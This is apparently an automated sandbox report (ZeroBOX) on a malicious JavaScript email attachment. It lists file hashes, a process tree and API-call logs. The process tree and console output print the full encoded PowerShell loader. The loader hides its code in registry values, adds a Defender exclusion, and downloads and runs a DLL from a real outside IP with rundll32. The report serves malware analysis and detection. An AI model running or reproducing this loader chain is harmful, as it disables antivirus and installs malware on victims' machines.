Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 7, 2023, 9:58 a.m.	March 7, 2023, 10 a.m.

Size	62.8KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`097dd5c5e9df7e83a46ef98a0e4c97cc`
SHA256	`2fd706e025d5058729c8d92fd687564105e01387e178dceee2dc9f9c435574ea`
CRC32	`8EA65506`
ssdeep	`768:yjg8qiCm/7GacAqjPv/d6zudaF4SbHhCRXclVR7bZhHibknbz96S/vmbz5UNhlK5:yjtqiHCa9DbmklhFMSi5sHjKGC8zxS`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Attachment-GAKND(28).js
2556
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu
  2736
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
  2808
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW
  2900
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ
  2996
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv
  744
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO
  2112
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively | %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively"
  2220
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
    2552
    - rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\\voidablenessUnfile.dll RS32
      2356

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 7, 2023, 9:58 a.m.			0	0
IsDebuggerPresent March 7, 2023, 9:58 a.m.			0	0

Command line console output was observed (50 out of 54 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: Exception calling "FromBase64String" with "1" argument(s): "Invalid length for console_handle: 0x00000023	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: a Base-64 char array." console_handle: 0x0000002f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: At line:1 char:212 console_handle: 0x0000003b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + $MeagerDissertation = Get-ItemProperty -Path HKCU:\\SOFTWARE\\VicariousPluton console_handle: 0x00000047	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: \| %{$_.maliceproof}; $MeagerDissertation = "Islanders" + $MeagerDissertation; console_handle: 0x00000053	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: [Reflection.Assembly]::Load([Convert]::fromBase64String <<<< ($MeagerDissertati console_handle: 0x0000005f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: on)); [classicyc1]::Execute("powershell -executionpolicy bypass -windowstyle hi console_handle: 0x0000006b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: dden ""`$currentDrive = `(get-location`).Drive.Name + ':\'; Add-MpPreference -E console_handle: 0x00000077	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: xclusionPath `$currentDrive;reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Win console_handle: 0x00000083	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: dows\CurrentVersion\Run /v Userinit /f; reg delete HKEY_CURRENT_USER\SOFTWARE\V console_handle: 0x0000008f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: icariousPluton /v maliceproof /f""");Invoke-WebRequest http://142.93.250.152/um console_handle: 0x0000009b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: UA6Sh/03 -O $env:TEMP\voidablenessUnfile.dll; rundll32 $env:TEMP\\voidablenessU console_handle: 0x000000a7	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: nfile.dll,RS32; console_handle: 0x000000b3	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000bf	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000cb	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: Unable to find type [classicyc1]: make sure that the assembly containing this t console_handle: 0x000000eb	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: ype is loaded. console_handle: 0x000000f7	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: At line:1 char:248 console_handle: 0x00000103	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + $MeagerDissertation = Get-ItemProperty -Path HKCU:\\SOFTWARE\\VicariousPluton console_handle: 0x0000010f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: \| %{$_.maliceproof}; $MeagerDissertation = "Islanders" + $MeagerDissertation; console_handle: 0x0000011b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: [Reflection.Assembly]::Load([Convert]::fromBase64String($MeagerDissertation)); console_handle: 0x00000127	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: [classicyc1] <<<< ::Execute("powershell -executionpolicy bypass -windowstyle hi console_handle: 0x00000133	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: dden ""`$currentDrive = `(get-location`).Drive.Name + ':\'; Add-MpPreference -E console_handle: 0x0000013f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: xclusionPath `$currentDrive;reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Win console_handle: 0x0000014b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: dows\CurrentVersion\Run /v Userinit /f; reg delete HKEY_CURRENT_USER\SOFTWARE\V console_handle: 0x00000157	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: icariousPluton /v maliceproof /f""");Invoke-WebRequest http://142.93.250.152/um console_handle: 0x00000163	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: UA6Sh/03 -O $env:TEMP\voidablenessUnfile.dll; rundll32 $env:TEMP\\voidablenessU console_handle: 0x0000016f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: nfile.dll,RS32; console_handle: 0x0000017b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + CategoryInfo : InvalidOperation: (classicyc1:String) [], Runtim console_handle: 0x00000187	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: eException console_handle: 0x00000193	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + FullyQualifiedErrorId : TypeNotFound console_handle: 0x0000019f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x000001bf	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x000001cb	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x000001d7	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: At line:1 char:600 console_handle: 0x000001e3	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + $MeagerDissertation = Get-ItemProperty -Path HKCU:\\SOFTWARE\\VicariousPluton console_handle: 0x000001ef	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: \| %{$_.maliceproof}; $MeagerDissertation = "Islanders" + $MeagerDissertation; console_handle: 0x000001fb	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: [Reflection.Assembly]::Load([Convert]::fromBase64String($MeagerDissertation)); console_handle: 0x00000207	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: [classicyc1]::Execute("powershell -executionpolicy bypass -windowstyle hidden " console_handle: 0x00000213	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: "`$currentDrive = `(get-location`).Drive.Name + ':\'; Add-MpPreference -Exclusi console_handle: 0x0000021f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: onPath `$currentDrive;reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\C console_handle: 0x0000022b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: urrentVersion\Run /v Userinit /f; reg delete HKEY_CURRENT_USER\SOFTWARE\Vicario console_handle: 0x00000237	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: usPluton /v maliceproof /f""");Invoke-WebRequest <<<< http://142.93.250.152/um console_handle: 0x00000243	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: UA6Sh/03 -O $env:TEMP\voidablenessUnfile.dll; rundll32 $env:TEMP\\voidablenessU console_handle: 0x0000024f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 88 events)

Time & API	Arguments	Status	Return
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049e7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ef50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ef50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ef50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ef50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ef50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ef50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049e790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049e790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049e790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049e390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ed50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f0d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049f010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00445aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004461a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004461a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004461a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00446468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00446468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00446468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00446468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00446468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
